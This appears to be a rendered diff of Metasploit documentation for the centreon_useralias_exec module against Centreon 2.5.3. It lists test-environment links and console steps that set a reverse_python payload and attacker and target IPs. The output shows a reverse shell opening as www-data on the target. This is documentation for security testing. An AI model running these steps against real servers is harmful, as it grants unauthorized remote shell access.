1
1
## Vulnerable Application
2
2
3
- [ Exploit-db] ( https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz )
4
- Archived Copy: [ github] ( https://github.com/h00die/MSF-Testing-Scripts )
3
+ 1 . [ Exploit-db] ( https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz )
4
+ 2 . Archived Copy: [ github] ( https://github.com/h00die/MSF-Testing-Scripts )
5
5
6
6
### Creating A Testing Environment
7
7
@@ -21,49 +21,35 @@ Creating a testing environment for this application contained many steps, so I f
21
21
22
22
1 . Install the application
23
23
2 . Start msfconsole
24
- 3 . Do: ``` use exploit/linux/http/centreon_useralias_exec ```
25
- 4 . Do: ``` set payload ```
26
- 5 . Do: ``` set rhost ```
27
- 6 . Do: ``` check ```
28
- ```
29
- [+] Version Detected: 2.5.3
30
- [*] 192.168.2.85:80 The target appears to be vulnerable.
31
- ```
24
+ 3 . Do: ` use exploit/linux/http/centreon_useralias_exec `
25
+ 4 . Do: ` set payload `
26
+ 5 . Do: ` set rhost `
27
+ 6 . Do: ` check `
32
28
7 . Do: ``` run ```
33
29
8 . You should get a shell.
34
- ```
35
- [*] Started reverse TCP handler on 192.168.2.229:4444
36
- [*] Sending malicious login
37
- [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
38
- whoami
39
- www-data
40
- uname -a
41
- Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
42
- ```
43
30
44
31
## Scenarios
45
32
46
- Just a standard run.
47
-
48
- ```
49
- msf > use exploit/linux/http/centreon_useralias_exec
50
- msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
51
- payload => cmd/unix/reverse_python
52
- msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
53
- lhost => 192.168.2.229
54
- msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
55
- rhost => 192.168.2.85
56
- msf exploit(centreon_useralias_exec) > set verbose true
57
- verbose => true
58
- msf exploit(centreon_useralias_exec) > check
59
- [+] Version Detected: 2.5.3
60
- [*] 192.168.2.85:80 The target appears to be vulnerable.
61
- msf exploit(centreon_useralias_exec) > exploit
62
- [*] Started reverse TCP handler on 192.168.2.229:4444
63
- [*] Sending malicious login
64
- [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
65
- whoami
66
- www-data
67
- uname -a
68
- Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
69
- ```
33
+ Just a standard run.
34
+
35
+ msf > use exploit/linux/http/centreon_useralias_exec
36
+ msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
37
+ payload => cmd/unix/reverse_python
38
+ msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
39
+ lhost => 192.168.2.229
40
+ msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
41
+ rhost => 192.168.2.85
42
+ msf exploit(centreon_useralias_exec) > set verbose true
43
+ verbose => true
44
+ msf exploit(centreon_useralias_exec) > check
45
+ [+] Version Detected: 2.5.3
46
+ [*] 192.168.2.85:80 The target appears to be vulnerable.
47
+ msf exploit(centreon_useralias_exec) > exploit
48
+ [*] Started reverse TCP handler on 192.168.2.229:4444
49
+ [*] Sending malicious login
50
+ [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
51
+ whoami
52
+ www-data
53
+ uname -a
54
+ Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
55
+
0 commit comments